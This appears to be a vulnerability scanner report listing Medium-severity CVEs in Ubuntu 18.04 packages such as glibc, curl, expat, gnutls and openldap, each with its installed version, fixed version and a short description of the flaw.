Medium CVE-2018-11236 libc6 2.27-3ubuntu1 2.27-3ubuntu1.2 glibc: Integer overflow in stdlib/canonicalize.c on 32-bit architectures leading to stack-based buffer overflow libc6:2.27-3ubuntu1
Medium CVE-2018-11237 libc6 2.27-3ubuntu1 2.27-3ubuntu1.2 glibc: Buffer overflow in __mempcpy_avx512_no_vzeroupper libc6:2.27-3ubuntu1
Medium CVE-2018-19591 libc6 2.27-3ubuntu1 2.27-3ubuntu1.2 glibc: file descriptor leak in if_nametoindex() in sysdeps/unix/sysv/linux/if_index.c libc6:2.27-3ubuntu1
Medium CVE-2020-1751 libc6 2.27-3ubuntu1 2.27-3ubuntu1.2 glibc: array overflow in backtrace functions for powerpc libc6:2.27-3ubuntu1
Medium CVE-2021-3999 libc6 2.27-3ubuntu1 2.27-3ubuntu1.5 glibc: Off-by-one buffer overflow/underflow in getcwd() libc6:2.27-3ubuntu1
Medium CVE-2018-11236 libc6-dev 2.27-3ubuntu1 2.27-3ubuntu1.2 glibc: Integer overflow in stdlib/canonicalize.c on 32-bit architectures leading to stack-based buffer overflow libc6-dev:2.27-3ubuntu1
Medium CVE-2018-11237 libc6-dev 2.27-3ubuntu1 2.27-3ubuntu1.2 glibc: Buffer overflow in __mempcpy_avx512_no_vzeroupper libc6-dev:2.27-3ubuntu1
Medium CVE-2018-19591 libc6-dev 2.27-3ubuntu1 2.27-3ubuntu1.2 glibc: file descriptor leak in if_nametoindex() in sysdeps/unix/sysv/linux/if_index.c libc6-dev:2.27-3ubuntu1
Medium CVE-2020-1751 libc6-dev 2.27-3ubuntu1 2.27-3ubuntu1.2 glibc: array overflow in backtrace functions for powerpc libc6-dev:2.27-3ubuntu1
Medium CVE-2021-3999 libc6-dev 2.27-3ubuntu1 2.27-3ubuntu1.5 glibc: Off-by-one buffer overflow/underflow in getcwd() libc6-dev:2.27-3ubuntu1
Medium CVE-2019-5094 libcom-err2 1.44.1-1 1.44.1-1ubuntu1.2 e2fsprogs: Crafted ext4 partition leads to out-of-bounds write libcom-err2:1.44.1-1
Medium CVE-2019-5188 libcom-err2 1.44.1-1 1.44.1-1ubuntu1.3 e2fsprogs: Out-of-bounds write in e2fsck/rehash.c libcom-err2:1.44.1-1
Medium CVE-2022-1304 libcom-err2 1.44.1-1 1.44.1-1ubuntu1.4 e2fsprogs: out-of-bounds read/write via crafted filesystem libcom-err2:1.44.1-1
Medium CVE-2018-0500 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.2 curl: Heap-based buffer overflow in Curl_smtp_escape_eob() when uploading data over SMTP libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2018-14618 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.3 curl: NTLM password overflow via integer overflow libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2018-16839 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.5 curl: Integer overflow leading to heap-based buffer overflow in Curl_sasl_create_plain_message() libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2018-16842 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.5 curl: Heap-based buffer over-read in the curl tool warning formatting libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2018-16890 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.6 curl: NTLM type-2 heap out-of-bounds buffer read libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2019-3822 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.6 curl: NTLMv2 type-3 header stack buffer overflow libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2019-5436 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.7 curl: TFTP receive heap buffer overflow in tftp_receive_packet() function libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2019-5481 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.8 curl: double free due to subsequent call of realloc() libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2019-5482 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.8 curl: heap buffer overflow in function tftp_receive_packet() libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2020-8177 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.9 curl: Incorrect argument check can allow remote servers to overwrite local files libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2020-8285 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.12 curl: Malicious FTP server can trigger stack overflow when CURLOPT_CHUNK_BGN_FUNCTION is used libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2020-8286 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.12 curl: Inferior OCSP verification libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2021-22876 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.13 curl: Leak of authentication credentials in URL via automatic Referer libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2021-22924 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.14 curl: Bad connection reuse due to flawed path name checks libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2021-22925 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.14 curl: Incorrect fix for CVE-2021-22898 TELNET stack contents disclosure libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2021-22946 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.15 curl: Requirement to use TLS not properly enforced for IMAP, POP3, and FTP protocols libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2021-22947 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.15 curl: Server responses received before STARTTLS processed after TLS handshake libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2022-22576 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.17 curl: OAUTH2 bearer bypass in connection re-use libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2022-27774 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.17 curl: credential leak on redirect libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2022-27782 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.18 curl: TLS and SSH connection too eager reuse libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2022-32206 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.19 curl: HTTP compression denial of service libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2022-32208 libcurl3-gnutls 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.19 curl: FTP-KRB bad message verification libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2018-0500 libcurl4 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.2 curl: Heap-based buffer overflow in Curl_smtp_escape_eob() when uploading data over SMTP libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2018-14618 libcurl4 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.3 curl: NTLM password overflow via integer overflow libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2018-16839 libcurl4 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.5 curl: Integer overflow leading to heap-based buffer overflow in Curl_sasl_create_plain_message() libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2018-16842 libcurl4 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.5 curl: Heap-based buffer over-read in the curl tool warning formatting libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2018-16890 libcurl4 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.6 curl: NTLM type-2 heap out-of-bounds buffer read libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2019-3822 libcurl4 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.6 curl: NTLMv2 type-3 header stack buffer overflow libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2019-5436 libcurl4 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.7 curl: TFTP receive heap buffer overflow in tftp_receive_packet() function libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2019-5481 libcurl4 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.8 curl: double free due to subsequent call of realloc() libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2019-5482 libcurl4 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.8 curl: heap buffer overflow in function tftp_receive_packet() libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2020-8177 libcurl4 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.9 curl: Incorrect argument check can allow remote servers to overwrite local files libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2020-8285 libcurl4 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.12 curl: Malicious FTP server can trigger stack overflow when CURLOPT_CHUNK_BGN_FUNCTION is used libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2020-8286 libcurl4 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.12 curl: Inferior OCSP verification libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2021-22876 libcurl4 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.13 curl: Leak of authentication credentials in URL via automatic Referer libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2021-22924 libcurl4 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.14 curl: Bad connection reuse due to flawed path name checks libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2021-22925 libcurl4 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.14 curl: Incorrect fix for CVE-2021-22898 TELNET stack contents disclosure libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2021-22946 libcurl4 7.58.0-2ubuntu3.1 7.58.0-2ubuntu3.15 curl: Requirement to use TLS not properly enforced for IMAP, POP3, and FTP protocols libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2021-22947 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.15curl: Server responses received before STARTTLS processed after TLS handshake libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2022-22576 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.17curl: OAUTH2 bearer bypass in connection re-use libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2022-27774 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.17curl: credential leak on redirect libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2022-27782 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.18curl: TLS and SSH connection too eager reuse libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2022-32206 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.19curl: HTTP compression denial of service libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2022-32208 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.19curl: FTP-KRB bad message verification libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2019-8457 libdb5.3 5.3.28-13.1ubuntu1 5.3.28-13.1ubuntu1.1 sqlite: heap out-of-bound read in function rtreenode() libdb5.3:5.3.28-13.1ubuntu1
Medium CVE-2022-1664 libdpkg-perl 1.19.0.5ubuntu2 1.19.0.5ubuntu2.4 Dpkg::Source::Archive in dpkg, the Debian package management system, b ... libdpkg-perl:1.19.0.5ubuntu2
Medium CVE-2019-15903 libexpat1 2.2.5-3 2.2.5-3ubuntu0.2 expat: heap-based buffer over-read via crafted XML input libexpat1:2.2.5-3
Medium CVE-2021-46143 libexpat1 2.2.5-3 2.2.5-3ubuntu0.4 expat: Integer overflow in doProlog in xmlparse.c libexpat1:2.2.5-3
Medium CVE-2022-22822 libexpat1 2.2.5-3 2.2.5-3ubuntu0.4 expat: Integer overflow in addBinding in xmlparse.c libexpat1:2.2.5-3
Medium CVE-2022-22823 libexpat1 2.2.5-3 2.2.5-3ubuntu0.4 expat: Integer overflow in build_model in xmlparse.c libexpat1:2.2.5-3
Medium CVE-2022-22824 libexpat1 2.2.5-3 2.2.5-3ubuntu0.4 expat: Integer overflow in defineAttribute in xmlparse.c libexpat1:2.2.5-3
Medium CVE-2022-22825 libexpat1 2.2.5-3 2.2.5-3ubuntu0.4 expat: Integer overflow in lookup in xmlparse.c libexpat1:2.2.5-3
Medium CVE-2022-22826 libexpat1 2.2.5-3 2.2.5-3ubuntu0.4 expat: Integer overflow in nextScaffoldPart in xmlparse.c libexpat1:2.2.5-3
Medium CVE-2022-22827 libexpat1 2.2.5-3 2.2.5-3ubuntu0.4 expat: Integer overflow in storeAtts in xmlparse.c libexpat1:2.2.5-3
Medium CVE-2022-23852 libexpat1 2.2.5-3 2.2.5-3ubuntu0.4 expat: Integer overflow in function XML_GetBuffer libexpat1:2.2.5-3
Medium CVE-2022-23990 libexpat1 2.2.5-3 2.2.5-3ubuntu0.4 expat: integer overflow in the doProlog function libexpat1:2.2.5-3
Medium CVE-2022-25313 libexpat1 2.2.5-3 2.2.5-3ubuntu0.7 expat: stack exhaustion in doctype parsing libexpat1:2.2.5-3
Medium CVE-2022-25314 libexpat1 2.2.5-3 2.2.5-3ubuntu0.7 expat: integer overflow in copyString() libexpat1:2.2.5-3
Medium CVE-2022-25315 libexpat1 2.2.5-3 2.2.5-3ubuntu0.7 expat: Integer overflow in storeRawNames() libexpat1:2.2.5-3
Medium CVE-2019-5094 libext2fs2 1.44.1-1 1.44.1-1ubuntu1.2 e2fsprogs: Crafted ext4 partition leads to out-of-bounds write libext2fs2:1.44.1-1
Medium CVE-2019-5188 libext2fs2 1.44.1-1 1.44.1-1ubuntu1.3 e2fsprogs: Out-of-bounds write in e2fsck/rehash.c libext2fs2:1.44.1-1
Medium CVE-2022-1304 libext2fs2 1.44.1-1 1.44.1-1ubuntu1.4 e2fsprogs: out-of-bounds read/write via crafted filesystem libext2fs2:1.44.1-1
Medium CVE-2019-13627 libgcrypt20 1.8.1-4ubuntu1.1 1.8.1-4ubuntu1.2 libgcrypt: ECDSA timing attack allowing private key leak libgcrypt20:1.8.1-4ubuntu1.1
Medium CVE-2021-40528 libgcrypt20 1.8.1-4ubuntu1.1 1.8.1-4ubuntu1.3 libgcrypt: ElGamal implementation allows plaintext recovery libgcrypt20:1.8.1-4ubuntu1.1
Medium CVE-2019-13627 libgcrypt20-dev 1.8.1-4ubuntu1.1 1.8.1-4ubuntu1.2 libgcrypt: ECDSA timing attack allowing private key leak libgcrypt20-dev:1.8.1-4ubuntu1.1
Medium CVE-2021-40528 libgcrypt20-dev 1.8.1-4ubuntu1.1 1.8.1-4ubuntu1.3 libgcrypt: ElGamal implementation allows plaintext recovery libgcrypt20-dev:1.8.1-4ubuntu1.1
Medium CVE-2018-10844 libgnutls-dane0 3.5.18-1ubuntu1 3.5.18-1ubuntu1.1 gnutls: HMAC-SHA-256 vulnerable to Lucky thirteen attack due to not enough dummy function calls libgnutls-dane0:3.5.18-1ubuntu1
Medium CVE-2018-10845 libgnutls-dane0 3.5.18-1ubuntu1 3.5.18-1ubuntu1.1 gnutls: HMAC-SHA-384 vulnerable to Lucky thirteen attack due to use of wrong constant libgnutls-dane0:3.5.18-1ubuntu1
Medium CVE-2018-10846 libgnutls-dane0 3.5.18-1ubuntu1 3.5.18-1ubuntu1.1 gnutls: "Just in Time" PRIME + PROBE cache-based side channel attack can lead to plaintext recovery libgnutls-dane0:3.5.18-1ubuntu1
Medium CVE-2019-3829 libgnutls-dane0 3.5.18-1ubuntu1 3.5.18-1ubuntu1.1 gnutls: use-after-free/double-free in certificate verification libgnutls-dane0:3.5.18-1ubuntu1
Medium CVE-2018-10844 libgnutls-openssl27 3.5.18-1ubuntu1 3.5.18-1ubuntu1.1 gnutls: HMAC-SHA-256 vulnerable to Lucky thirteen attack due to not enough dummy function calls libgnutls-openssl27:3.5.18-1ubuntu1
Medium CVE-2018-10845 libgnutls-openssl27 3.5.18-1ubuntu1 3.5.18-1ubuntu1.1 gnutls: HMAC-SHA-384 vulnerable to Lucky thirteen attack due to use of wrong constant libgnutls-openssl27:3.5.18-1ubuntu1
Medium CVE-2018-10846 libgnutls-openssl27 3.5.18-1ubuntu1 3.5.18-1ubuntu1.1 gnutls: "Just in Time" PRIME + PROBE cache-based side channel attack can lead to plaintext recovery libgnutls-openssl27:3.5.18-1ubuntu1
Medium CVE-2019-3829 libgnutls-openssl27 3.5.18-1ubuntu1 3.5.18-1ubuntu1.1 gnutls: use-after-free/double-free in certificate verification libgnutls-openssl27:3.5.18-1ubuntu1
Medium CVE-2018-10844 libgnutls28-dev 3.5.18-1ubuntu1 3.5.18-1ubuntu1.1 gnutls: HMAC-SHA-256 vulnerable to Lucky thirteen attack due to not enough dummy function calls libgnutls28-dev:3.5.18-1ubuntu1
Medium CVE-2018-10845 libgnutls28-dev 3.5.18-1ubuntu1 3.5.18-1ubuntu1.1 gnutls: HMAC-SHA-384 vulnerable to Lucky thirteen attack due to use of wrong constant libgnutls28-dev:3.5.18-1ubuntu1
Medium CVE-2018-10846 libgnutls28-dev 3.5.18-1ubuntu1 3.5.18-1ubuntu1.1 gnutls: "Just in Time" PRIME + PROBE cache-based side channel attack can lead to plaintext recovery libgnutls28-dev:3.5.18-1ubuntu1
Medium CVE-2019-3829 libgnutls28-dev 3.5.18-1ubuntu1 3.5.18-1ubuntu1.1 gnutls: use-after-free/double-free in certificate verification libgnutls28-dev:3.5.18-1ubuntu1
Medium CVE-2018-10844 libgnutls30 3.5.18-1ubuntu1 3.5.18-1ubuntu1.1 gnutls: HMAC-SHA-256 vulnerable to Lucky thirteen attack due to not enough dummy function calls libgnutls30:3.5.18-1ubuntu1
Medium CVE-2018-10845 libgnutls30 3.5.18-1ubuntu1 3.5.18-1ubuntu1.1 gnutls: HMAC-SHA-384 vulnerable to Lucky thirteen attack due to use of wrong constant libgnutls30:3.5.18-1ubuntu1
Medium CVE-2018-10846 libgnutls30 3.5.18-1ubuntu1 3.5.18-1ubuntu1.1 gnutls: "Just in Time" PRIME + PROBE cache-based side channel attack can lead to plaintext recovery libgnutls30:3.5.18-1ubuntu1
Medium CVE-2019-3829 libgnutls30 3.5.18-1ubuntu1 3.5.18-1ubuntu1.1 gnutls: use-after-free/double-free in certificate verification libgnutls30:3.5.18-1ubuntu1
Medium CVE-2018-10844 libgnutlsxx28 3.5.18-1ubuntu1 3.5.18-1ubuntu1.1 gnutls: HMAC-SHA-256 vulnerable to Lucky thirteen attack due to not enough dummy function calls libgnutlsxx28:3.5.18-1ubuntu1
Medium CVE-2018-10845 libgnutlsxx28 3.5.18-1ubuntu1 3.5.18-1ubuntu1.1 gnutls: HMAC-SHA-384 vulnerable to Lucky thirteen attack due to use of wrong constant libgnutlsxx28:3.5.18-1ubuntu1
Medium CVE-2018-10846 libgnutlsxx28 3.5.18-1ubuntu1 3.5.18-1ubuntu1.1 gnutls: "Just in Time" PRIME + PROBE cache-based side channel attack can lead to plaintext recovery libgnutlsxx28:3.5.18-1ubuntu1
Medium CVE-2019-3829 libgnutlsxx28 3.5.18-1ubuntu1 3.5.18-1ubuntu1.1 gnutls: use-after-free/double-free in certificate verification libgnutlsxx28:3.5.18-1ubuntu1
Medium CVE-2020-28196 libgssapi-krb5-2 1.16-2build1 1.16-2ubuntu0.2 krb5: unbounded recursion via an ASN.1-encoded Kerberos message in lib/krb5/asn.1/asn1_encode.c may lead to DoS libgssapi-krb5-2:1.16-2build1
Medium CVE-2021-20305 libhogweed4 3.4-1 3.4-1ubuntu0.1 nettle: Out of bounds memory access in signature verification libhogweed4:3.4-1
Medium CVE-2021-3580 libhogweed4 3.4-1 3.4.1-0ubuntu0.18.04.1 nettle: Remote crash in RSA decryption via manipulated ciphertext libhogweed4:3.4-1
Medium CVE-2020-10531 libicu60 60.2-3ubuntu3 60.2-3ubuntu3.1 ICU: Integer overflow in UnicodeString::doAppend() libicu60:60.2-3ubuntu3
Medium CVE-2019-12290 libidn2-0 2.0.4-1.1build2 2.0.4-1.1ubuntu0.2 GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specifi ... libidn2-0:2.0.4-1.1build2
Medium CVE-2019-18224 libidn2-0 2.0.4-1.1build2 2.0.4-1.1ubuntu0.2 libidn2: heap-based buffer overflow in idn2_to_ascii_4i in lib/lookup.c libidn2-0:2.0.4-1.1build2
Medium CVE-2019-12290 libidn2-0-dev 2.0.4-1.1build2 2.0.4-1.1ubuntu0.2 GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specifi ... libidn2-0-dev:2.0.4-1.1build2
Medium CVE-2019-18224 libidn2-0-dev 2.0.4-1.1build2 2.0.4-1.1ubuntu0.2 libidn2: heap-based buffer overflow in idn2_to_ascii_4i in lib/lookup.c libidn2-0-dev:2.0.4-1.1build2
Medium CVE-2019-12290 libidn2-dev 2.0.4-1.1build2 2.0.4-1.1ubuntu0.2 GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specifi ... libidn2-dev:2.0.4-1.1build2
Medium CVE-2019-18224 libidn2-dev 2.0.4-1.1build2 2.0.4-1.1ubuntu0.2 libidn2: heap-based buffer overflow in idn2_to_ascii_4i in lib/lookup.c libidn2-dev:2.0.4-1.1build2
Medium CVE-2020-28196 libk5crypto3 1.16-2build1 1.16-2ubuntu0.2 krb5: unbounded recursion via an ASN.1-encoded Kerberos message in lib/krb5/asn.1/asn1_encode.c may lead to DoS libk5crypto3:1.16-2build1
Medium CVE-2020-28196 libkrb5-3 1.16-2build1 1.16-2ubuntu0.2 krb5: unbounded recursion via an ASN.1-encoded Kerberos message in lib/krb5/asn.1/asn1_encode.c may lead to DoS libkrb5-3:1.16-2build1
Medium CVE-2020-28196 libkrb5support0 1.16-2build1 1.16-2ubuntu0.2 krb5: unbounded recursion via an ASN.1-encoded Kerberos message in lib/krb5/asn.1/asn1_encode.c may lead to DoS libkrb5support0:1.16-2build1
Medium CVE-2019-13565 libldap-2.4-2 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.3 openldap: ACL restrictions bypass due to sasl_ssf value being set permanently libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-12243 libldap-2.4-2 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.5 openldap: denial of service via nested boolean expressions in LDAP search filters libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-25692 libldap-2.4-2 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.7 openldap: NULL pointer dereference for unauthenticated packet in slapd libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-25709 libldap-2.4-2 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.8 openldap: assertion failure in Certificate List syntax validation libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-25710 libldap-2.4-2 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.8 openldap: assertion failure in CSN normalization with invalid input libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36221 libldap-2.4-2 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.9 openldap: Integer underflow in serialNumberAndIssuerCheck in schema_init.c libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36222 libldap-2.4-2 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.9 openldap: Assertion failure in slapd in the saslAuthzTo validation libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36223 libldap-2.4-2 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.9 openldap: Out-of-bounds read in Values Return Filter libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36224 libldap-2.4-2 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.9 openldap: Invalid pointer free in the saslAuthzTo processing libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36225 libldap-2.4-2 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.9 openldap: Double free in the saslAuthzTo processing libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36226 libldap-2.4-2 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.9 openldap: Denial of service via length miscalculation in slap_parse_user libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36227 libldap-2.4-2 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.9 openldap: Infinite loop in slapd with the cancel_extop Cancel operation libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36228 libldap-2.4-2 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.9 openldap: Integer underflow in issuerAndThisUpdateCheck in schema_init.c libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36229 libldap-2.4-2 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.9 openldap: Type confusion in ad_keystring in ad.c libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36230 libldap-2.4-2 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.9 openldap: Assertion failure in ber_next_element in decode.c libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2021-27212 libldap-2.4-2 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.10 openldap: Assertion failure in slapd in the issuerAndThisUpdateCheck function libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2022-29155 libldap-2.4-2 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.11 openldap: OpenLDAP SQL injection libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2019-13565 libldap-common 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.3 openldap: ACL restrictions bypass due to sasl_ssf value being set permanently libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-12243 libldap-common 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.5 openldap: denial of service via nested boolean expressions in LDAP search filters libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-25692 libldap-common 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.7 openldap: NULL pointer dereference for unauthenticated packet in slapd libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-25709 libldap-common 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.8 openldap: assertion failure in Certificate List syntax validation libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-25710 libldap-common 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.8 openldap: assertion failure in CSN normalization with invalid input libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36221 libldap-common 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.9 openldap: Integer underflow in serialNumberAndIssuerCheck in schema_init.c libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36222 libldap-common 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.9 openldap: Assertion failure in slapd in the saslAuthzTo validation libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36223 libldap-common 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.9 openldap: Out-of-bounds read in Values Return Filter libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36224 libldap-common 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.9 openldap: Invalid pointer free in the saslAuthzTo processing libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36225 libldap-common 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.9 openldap: Double free in the saslAuthzTo processing libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36226 libldap-common 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.9 openldap: Denial of service via length miscalculation in slap_parse_user libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36227 libldap-common 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.9 openldap: Infinite loop in slapd with the cancel_extop Cancel operation libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36228 libldap-common 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.9 openldap: Integer underflow in issuerAndThisUpdateCheck in schema_init.c libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36229 libldap-common 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.9 openldap: Type confusion in ad_keystring in ad.c libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36230 libldap-common 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.9 openldap: Assertion failure in ber_next_element in decode.c libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2021-27212 libldap-common 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.10 openldap: Assertion failure in slapd in the issuerAndThisUpdateCheck function libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2022-29155 libldap-common 2.4.45+dfsg-1ubuntu1 2.4.45+dfsg-1ubuntu1.11 openldap: OpenLDAP SQL injection libldap-common:2.4.45+dfsg-1ubuntu1
